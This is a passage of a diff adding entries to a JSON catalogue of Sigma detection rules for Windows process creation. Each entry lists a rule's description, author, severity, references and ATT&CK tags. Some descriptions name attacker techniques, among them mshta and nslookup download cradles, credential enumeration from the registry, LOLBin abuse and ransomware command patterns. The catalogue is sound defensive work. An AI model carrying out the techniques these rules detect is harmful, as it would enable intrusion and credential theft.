+ "description": "Detects Obfuscated Powershell via Stdin in Scripts",
+ "meta": {
+ "author": "Nikita Nazarov, oscd.community",
+ "creation_date": "2020/10/12",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_invoke_obfuscation_via_stdin.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/issues/1009",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_stdin.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490",
+ "value": "Invoke-Obfuscation Via Stdin"
+ },
+ {
+ "description": "Execute C# code with the Build Provider and proper folder structure in place.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/11/24",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_lolbin_aspnet_compiler.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": 
"windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "value": "Suspicious aspnet_compiler.exe Execution" + }, + { + "description": "Detects different loaders as described in various threat reports on Lazarus group activity", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2020/12/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_lazarus_loader.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hvs-consulting.de/lazarus-report/", + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e", + "value": "Lazarus Loaders" + }, + { + "description": "Detects the execution of a AdFind for enumeration based on it's commadline flags", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_adfind_enumeration.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", + "https://www.joeware.net/freetools/tools/adfind/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "value": "Suspicious AdFind Enumeration" + }, + { + "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_redirect_local_admin_share.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" + ], + "tags": "No established tags" + }, + "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", + "value": "Suspicious Redirection to Local Admin Share" + }, + { + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_script_event_consumer_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, 
+ "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", + "value": "Script Event Consumer Spawning Process" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_group_recon.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_group_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32", + "value": "Suspicious Get Local Groups Information with WMIC" + }, + { + "description": "An adversary might use WMI to execute commands on a remote system", + "meta": { + "author": "frack113", + "creation_date": "2022/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_remote_command.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "e42af9df-d90b-4306-b7fb-05c863847ebd", + "value": 
"WMI Remote Command Execution" + }, + { + "description": "Detect the use of Jlaive to execute assemblies in a copied PowerShell", + "meta": { + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "creation_date": "2022/05/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_jlaive_batch_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/ch2sh/Jlaive", + "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "value": "Jlaive Usage For Assembly Execution In-Memory" + }, + { + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "WSL (Windows Sub System For Linux)", + "Other currently unknown software" + ], + "filename": "proc_creation_win_mstsc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "954f0af7-62dd-418f-b3df-a84bc2c7a774", + "value": "Remote Desktop Protocol Use Mstsc" + }, + { + "description": "Detects the use of the lesser known remote execution 
tool named CsExec (a PsExec alternative)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_csexec.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://github.com/malcomvetter/CSExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csexec.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "value": "CsExec Remote Execution Tool Usage" + }, + { + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "meta": { + "author": "Eli Salem, Sander Wiebing, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_regini_ads.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "value": "Modifies the Registry From a ADS" + }, + { + "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/14", + 
"falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_type.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_type.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "value": "Potential Download/Upload Activity Using Type Command" + }, + { + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mshta_http.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.005" + ] + }, + "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", + "value": "Mshta Remotely Hosted HTA File Execution" + }, + { + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/12/20", + "falsepositive": [ + "Rare intended use of hidden services" + ], + "filename": "proc_creation_win_using_sc_to_hide_sevices.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": 
"windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "value": "Abuse of Service Permissions to Hide Services in Tools" + }, + { + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_enumeration_for_credentials_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", + "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", + "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.002" + ] + }, + "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", + "value": "Enumeration for 3rd Party Creds From CLI" + }, + { + "description": "Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_commandline_chars.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml" + ], + "tags": "No established tags" + }, + "uuid": "2c0d2d7b-30d6-4d14-9751-7b9113042ab9", + "value": "Suspicious Characters in CommandLine" + }, + { + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "meta": { + "author": "Florian Roth, Tigzy", + "creation_date": "2021/11/17", + "falsepositive": [ + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + ], + "filename": "proc_creation_win_susp_winrar_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1460978167628406785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", + "value": "Winrar Execution in Non-Standard Folder" + }, + { + "description": "Download or Copy file with Extrac32", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_extrac32.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", + "value": "Suspicious 
Extrac32 Execution" + }, + { + "description": "Detects EnableUnsafeClientMailRules used for Script Execution from Outlook", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_outlook.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/sensepost/ruler", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.t1202" + ] + }, + "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", + "value": "Suspicious Execution from Outlook" + }, + { + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/06/19", + "falsepositive": [ + "Unknown, maybe some security software installer disables these features temporarily" + ], + "filename": "proc_creation_win_susp_disable_ie_features.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "value": "Disabled IE Security Features" + }, + { + "description": "Detects suspicious powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_nslookup_poweshell_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1566489367232651264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "value": "Nslookup PowerShell Download Cradle - ProcessCreation" + }, + { + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malicious_cmdlets.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://adsecurity.org/?p=2921", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/calebstewart/CVE-2021-1675", + 
"https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" + ] + }, + "uuid": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "value": "Malicious PowerShell Commandlets - ProcessCreation" + }, + { + "description": "Detects suspicious command line to remove and 'exe' or 'dll'", + "meta": { + "author": "frack113", + "creation_date": "2021/12/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_del.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_del.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "204b17ae-4007-471b-917b-b917b315c5db", + "value": "Suspicious Del in CommandLine" + }, + { + "description": "This command line patterns found in BlackByte Ransomware operations", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ransom_blackbyte.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml" + ], + "tags": "No established tags" + }, + "uuid": 
"999e8307-a775-4d5f-addc-4855632335be", + "value": "BlackByte Ransomware Patterns" + }, + { + "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_false_sysinternalsuite.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_false_sysinternalsuite.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "value": "Potential Binary Impersonating Sysinternals Tools" + }, + { + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wuauclt_cmdline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml" + ], + "tags": "No established tags" + }, + "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "value": "Suspicious Windows Update Agent Empty Cmdline" + }, + { + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/09", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_calc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ItsReallyNick/status/1094080242686312448", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_calc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "value": "Suspicious Calculator Usage" + }, + { + "description": "Detects the execution of a renamed office binaries", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_office_processes.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://infosec.exchange/@sbousseaden/109542254124022664", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "value": "Renamed Office Binary Execution" + }, + { + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "meta": { + "author": "Florian Roth, omkar72, oscd.community", + "creation_date": "2021/02/24", + "falsepositive": [ + "Admin activity (unclear what they do nowadays with finger.exe)" + ], + "filename": "proc_creation_win_susp_finger_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", + "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", + "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", + "value": "Finger.exe Suspicious Invocation" + }, + { + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_mpiexec_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", + "https://twitter.com/mrd0x/status/1465058133303246867", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", + "value": "MpiExec Lolbin" + }, + { + "description": "Detects usage of the \"systeminfo\" command to retrieve information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_systeminfo.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + 
"uuid": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", + "value": "Suspicious Execution of Systeminfo" + }, + { + "description": "Detects diagcab leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in CVE-2022-30190", + "meta": { + "author": "GossiTheDog (rule), frack113 (sigma version)", + "creation_date": "2022/06/09", + "falsepositive": [ + "Legitimate usage of \".diagcab\" files" + ], + "filename": "proc_creation_win_msdt_diagcab.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", + "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3", + "value": "Execute MSDT.EXE Using Diagcab File" + }, + { + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th postiional argument", + "meta": { + "author": "Nasreddine Bencherchali, memory-shards", + "creation_date": "2022/12/24", + "falsepositive": [ + "Legitimate use via Intune management. 
You exclude script paths and names to reduce FP rate" + ], + "filename": "proc_creation_win_lolbin_agentexecutor.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://twitter.com/lefterispan/status/1286259016436514816", + "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", + "value": "AgentExecutor PowerShell Execution" + }, + { + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/22", + "falsepositive": [ + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + ], + "filename": "proc_creation_win_susp_renamed_paexec.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "value": "Renamed PAExec" + }, + { + "description": "Well-known TAP software installation. 
